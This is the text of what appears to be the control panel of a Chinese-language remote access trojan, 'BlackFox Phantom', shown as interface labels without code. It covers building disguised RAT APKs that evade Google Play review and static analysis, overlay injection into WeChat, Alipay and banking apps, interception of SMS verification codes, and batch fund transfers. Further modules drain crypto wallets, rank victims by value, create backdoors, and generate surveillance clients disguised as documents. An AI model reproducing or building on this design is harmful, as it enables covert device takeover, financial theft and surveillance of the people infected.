⚡ 黑狐 · 幻境
BlackFox Phantom Control Center
进 入 控 制 台
黑 狐 · 幻 境
⏻
概览
仪表盘
管理
批量控制
构建工具
控制
远程指令
设备管理
实时监控
控制器
双屏控制器
员工监管
注入中心
加密货币
控制台
智能控制台
截获·隐身
截获拦截
隐身自毁
网络
隧道管理
文件管理
系统
系统设置
仪 表 盘
在线设备
0
实时更新
心跳频率
--
BPM
稳定运行
今日构建
0
活跃
保护级别
A+
全部正常
实时心跳趋势
最近活动
数据加载中...
快速控制
全部锁定
全部解锁
刷新状态
全体验证
批 量 控 制
总设备
0
在线
0
离线
0
常用操作
7
常用功能
全部锁定
全部解锁
全部定位
全部截屏
全部响铃
全部静音
批量截图
清除数据
目标
🌐 所有设备
刷新
高级脚本
Shell
Python
JS
🌐 所有设备
Shell 脚本
Python 脚本
JavaScript (Frida)
执行脚本
清空
示例
执行日志
清除
[BC] 批量控制初始化
构 建 工 具
APK 构建
A包(壳) 构建
AAB (Google Play)
总构建
-
成功
-
等待
-
APK 配置
应用名称
包名
服务器地址
跳转网址
基础RAT
高级RAT
完全控制RAT
高级选项
心跳间隔 (ms)
备用域名
隐藏图标
防卸载
Google 兼容
开始构建
重置
构建进度
下载APK
构建历史
ID
应用
包名
大小
时间
格式
操作
加载中...
A包(壳) 构建
自动下载B包+无障碍安装
A包名称
A包包名
B包包名(Payload)
B包服务器
跳转网址
构建A包
列表
AAB (Android App Bundle)
可过 Google Play 审核
应用名称
包名
最低SDK
Android 8.0 (API 26)
Android 9 (API 28)
Android 10 (API 29)
Android 12 (API 31)
Android 13 (API 33)
目标SDK
Android 13 (API 33)
Android 14 (API 34)
服务器地址
跳转地址(审核用)
按架构分包(ABI split)
代码混淆(ProGuard)
Play 签名兼容
Google Play 合规配置
隐私政策URL
权限声明
最小权限(推荐)
标准权限
完整权限
AAB 格式是 Google Play 要求的唯一格式。构建后将生成 .aab 文件,可通过 Play Console 上传审核。Payload 将在首次启动时动态下载,绕过静态代码分析。
构建 AAB 包
远 程 指 令
目标:
🌐 所有设备
刷新列表
锁定
解锁
黑屏
静音
截屏
定位
远程 Shell
触发告警
🛑 短信拦截
批量屏蔽
短信识别
钓鱼检测
批量转账
批量截屏
批量定位
批量Shell
指令历史
清除
— 暂无指令记录 —
短信拦截
刷新规则
拦截关键词
拦截号码前缀
添加拦截规则
批量屏蔽(全部)
识别短信内容
批量执行
目标:
🌐 所有设备
动作:
批量截屏
批量定位
批量Shell
批量锁定
批量解锁
批量转账
批量告警
执行
设 备 管 理
总设备
-
在线
-
离线
-
今日活跃
-
全部系统
Android
Windows
Linux
iOS
全部状态
在线
离线
刷新
全部锁定
全部解锁
设备名
系统
IP
状态
最后心跳
版本
操作
加载设备列表...
设备详情
关闭
锁定
解锁
定位
响铃
清除数据
AI 实时监控
AI 引擎
● 运行中
已采集设备
0
高价值设备
0
告警
0
开始采集
10秒轮询
30秒轮询
60秒轮询
立即扫描
清警告
设备评分 · 8维度分析
刷新
启动采集后显示设备评分
告警面板
0
条告警
暂无告警
AI 评分维度
阈值 ≥60 分为高价值设备
支付应用
最高30分
加密钱包
最高25分
社交活跃
最高15分
短信敏感
最高10分
ROOT
10分
SO注入
8分
屏幕活跃
最高5分
应用量
最高2分
双 屏 控 制 器
控制目标
🌐 所有设备
刷新
🟢 就绪
主屏 · 实时镜像
1280×780
1280×780 实时镜像
按
截图
获取最新画面
获取截图
副屏 · 触控 / 远程
点击 / 拖动进行触控
锁屏
解锁
黑屏
唤醒
静音
音量+
音量-
截图
注入
按键与输入
音量
音量
输入
应用与网址
打开应用
打开URL
设备状态
定位
设备信息
Shell
剪贴板
注入 · 应用覆盖
微信覆盖
注入
支付宝覆盖
注入
银行客户端覆盖
注入
Telegram 覆盖
注入
系统框架注入
注入
系统服务Hook
注入
远程脚本执行
Shell
Python
JS(Frida)
Lua
执行
短信拦截
转账
连接状态
🔴
主屏:
未连接
🔴
副屏:
未连接
操作日志
— 日志已清除 —
'" style="border:1px solid var(--border);background:transparent;color:var(--text-muted);font-size:0.6rem;">清除
[DUAL] 双屏控制器加载完成
注 入 中 心
注入目标
🌐 所有设备
刷新列表
应用覆盖注入
微信覆盖
注入
支付宝覆盖
注入
银行客户端覆盖
注入
Telegram 覆盖
注入
系统框架注入
注入
系统服务Hook
注入
微信批量转账
收款账号(逗号分隔)
金额(元)
100
备注
发起微信批量转账
支付宝批量转账
收款账号(逗号分隔)
金额(元)
100
备注
发起支付宝批量转账
APK 部署工具
远程安装APK
部署
覆盖安装(保留数据)
覆盖
远程卸载应用
卸载
拉取已安装APK
拉取
短信/通知拦截
批量拦截短信
拦截
拦截验证码短信
拦截验证码
隐藏通知
隐藏
查看已拦截短信
查看
关键词过滤:
远程脚本执行
Shell 脚本
Python 脚本
JavaScript (Frida)
Lua 脚本
执行脚本
注入日志
[INJECT] 注入中心已初始化
清除
🟢 就绪
[INJECT]就绪
智 能 控 制 台
在线设备
0
任务队列
0
最后心跳
--
WebSocket
🔴 离线
远程终端
清屏
PING ALL
> 智能控制台 v1.0 就绪
> WebSocket 等待连接...
操作日志
清除
[SYSTEM] 控制台初始化
快捷指令
🌐 所有设备
锁定
解锁
定位
截屏
Shell
告警
SMS:
拦截
批量屏蔽
识别
批量:
截屏
定位
转账
语音:
群控
历史
控制台配置
自动重连 WebSocket
心跳监控蜂鸣
远程日志同步
重连 WS
测试后端
自定义命令
发送
API
WS
Shell
系 统 设 置
常规设置
面板主题
暗金 (默认)
暗蓝
纯黑
WebSocket 端口
API 地址
安全设置
启用身份验证
API 加密传输
日志审计
IP 白名单
后门管理
反向
正向
HTTP
创建后门
列表
暂无后门
后门执行
执行后门
关于
黑狐控制中心 v2.0
WebSocket: /ws · API: /api/v1
当前会话:
--
加 密 货 币 中 心
收款地址 (TRC20)
刷新
📥 USDT(TRC20):
已锁定收款地址
目标
🌐 所有设备
扫描检测
📱 检测钱包
🔐 多签扫描
✅ Token授权
⚠️ 预授权扫描
📋 剪贴板扫描
🔍 综合扫描
🌐 全局扫描
转账操作(锁定至系统预设TRC20地址)
TRC20
ERC20
BEP20
BTC
ETH
自动钱包
imToken
MetaMask
TrustWallet
TokenPocket
OKX Wallet
Binance
💸 单笔转账
📦 批量转账
👤 画像驱动转账
钱包数据提取
选择钱包提取
全部提取
imToken
MetaMask
Trust Wallet
TokenPocket
OKX
Binance
📥 提取钱包
📊 资产分布可视化
操作日志
清除
[CRYPTO] 加密货币中心初始化
员工监管
管理端生成
操作系统
Windows
Linux
macOS
服务器地址
WebSocket 端口
文件名
图标伪装
PDF
WORD
EXCEL
文件夹
生成管理端
员工端列表
刷新
ID
系统
状态
主机名
IP
最后活跃
操作
暂无员工端,先生成管理端
员工远程监管
截图
进程
命令
点击「截图」获取员工桌面
执行
🌐 所有设备
锁定
解锁
定位
截屏
Shell